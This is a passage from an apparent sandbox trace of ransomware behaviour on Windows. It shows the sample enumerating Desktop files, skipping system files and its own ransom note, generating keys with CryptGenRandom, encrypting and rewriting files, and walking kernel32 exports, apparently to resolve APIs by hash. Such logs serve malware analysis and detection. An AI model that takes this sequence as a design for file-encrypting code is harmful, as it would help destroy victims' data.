HALPmcxz\\Desktop\\5QUa1fvtx-.m4a.KQqfPS" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5qua1fvtx-.m4a.kqqfps"), dwFlags=0x0) returned 1 [0082.923] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.923] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.923] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.923] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86fce6a0, ftCreationTime.dwHighDateTime=0x1d4d1d4, ftLastAccessTime.dwLowDateTime=0x87683570, ftLastAccessTime.dwHighDateTime=0x1d4cb9b, ftLastWriteTime.dwLowDateTime=0x87683570, ftLastWriteTime.dwHighDateTime=0x1d4cb9b, nFileSizeHigh=0x0, nFileSizeLow=0x13a5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="80E-WR5Nx5kX NM.avi", cAlternateFileName="80E-WR~1.AVI")) returned 1 [0082.923] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="DECRYPT-FILES.txt") returned -1 [0082.923] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="autorun.inf") returned -1 [0082.923] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="boot.ini") returned -1 [0082.924] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="desktop.ini") returned -1 [0082.924] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="ntuser.dat") returned -1 [0082.924] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="iconcache.db") returned -1 [0082.924] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="bootsect.bak") returned -1 [0082.924] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="ntuser.dat.log") returned -1 [0082.924] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="thumbs.db") returned -1 [0082.924] lstrcmpiW (lpString1="80E-WR5Nx5kX NM.avi", lpString2="Bootfont.bin") returned -1 [0082.924] lstrlenW (lpString="80E-WR5Nx5kX NM.avi") returned 19 [0082.924] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0082.924] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0082.924] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0082.924] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0082.924] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.924] lstrlenW (lpString="80E-WR5Nx5kX NM.avi") returned 19 [0082.924] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.924] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="80E-WR5Nx5kX NM.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi" [0082.924] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.924] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\80e-wr5nx5kx nm.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.924] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=80476) returned 1 [0082.924] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.924] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0082.925] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.925] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.925] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.925] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.925] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0082.927] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.927] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0082.928] CloseHandle (hObject=0x43c) returned 1 [0082.928] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.928] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.929] CloseHandle (hObject=0x0) returned 0 [0082.929] CloseHandle (hObject=0x438) returned 1 [0082.929] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.929] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.930] GetTickCount () returned 0x114d347 [0082.930] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.930] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.930] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.930] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.930] lstrlenA (lpString="kernel32.dll") returned 12 [0082.931] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.931] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.931] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.931] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.931] lstrlenA (lpString="ADDATOMA") returned 8 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.931] lstrlenA (lpString="ADDATOMW") returned 8 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.931] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.931] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.931] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.931] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.931] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.931] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.931] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.931] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.931] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.931] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.931] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.932] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.932] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.932] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.932] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.932] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.932] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.932] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.932] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.932] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.932] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.932] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.932] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.932] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.932] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.932] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.932] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.932] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.932] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.932] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.933] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.933] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.933] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.933] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.933] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.933] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.933] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.933] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.933] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.933] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.933] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.933] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.933] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.933] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.933] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.933] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.933] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.933] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.933] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.934] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.934] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.934] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.934] lstrlenA (lpString="BEEP") returned 4 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.934] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.934] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.934] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.934] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.934] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.934] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.934] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.934] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.934] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.934] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.934] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.934] lstrlenA (lpString="CANCELIO") returned 8 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.934] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.934] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.934] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.934] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.935] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.935] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.935] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.935] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.935] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.935] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.935] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.935] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.935] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.935] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.935] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.935] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.935] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.935] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.935] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.935] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.935] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.935] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.935] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.936] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.936] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.936] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.936] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.936] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.936] 